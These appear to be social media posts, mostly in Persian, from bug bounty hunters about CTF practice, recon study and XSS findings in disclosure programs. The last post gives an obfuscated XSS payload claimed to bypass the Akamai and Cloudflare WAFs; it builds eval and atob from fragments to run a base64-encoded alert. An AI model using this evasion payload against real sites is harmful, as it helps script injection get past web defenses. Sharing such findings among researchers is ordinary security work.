مطالبی که از خود کلاس یاد گرفتم یه طرف، چیزایی که از امتحان OWASP و چلنج mig-mig یاد گرفتم یه طرف دیگه
خیلی کیف داد (به جز فلگ 6 که سرش زاییدم)
یاشوHossein Maktoobian
بالاخره بعد 2 تا Duplicate نوبت ما هم شد 😂
چهار روز سفت و سخت خوابیدم رو یه پروگرم VDP که فقط از روش XSS دربیارم که خوشبختانه هم پیدا شد و هم تریاژ شد :)
یاشو
رفقا من خیلی کوچیک تر از اینم که در جایگاه آموزش دهنده باشم
من همچنان در به در دنبال افرادی هستم که هنوز از تجربه هاشون چیز های جدید یاد بگیرم
ولی دوس داشتم تولید محتوا تو حوزه خودم رو شروع کنم( مخصوصا برای یادگیری و یاد آوری خودم)
خواستم اینو توییت کنم ببینم چقدر حمایت میشه🌝
تقریباً سه هفتهای میشه که دارم راجب wide recon مطالعه میکنم و متوجه شدم که خیلی فراتر از اینه که فقط یه subfinder اجرا کنی. دانشی که بدست آوردم با دانشی که قبلا از narrow recon داشتم ترکیب کردم و نتیجش بعد دو سه ساعت کار کردن روی یه پروگرم vdp پنج تا xss بود.
یاشو
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>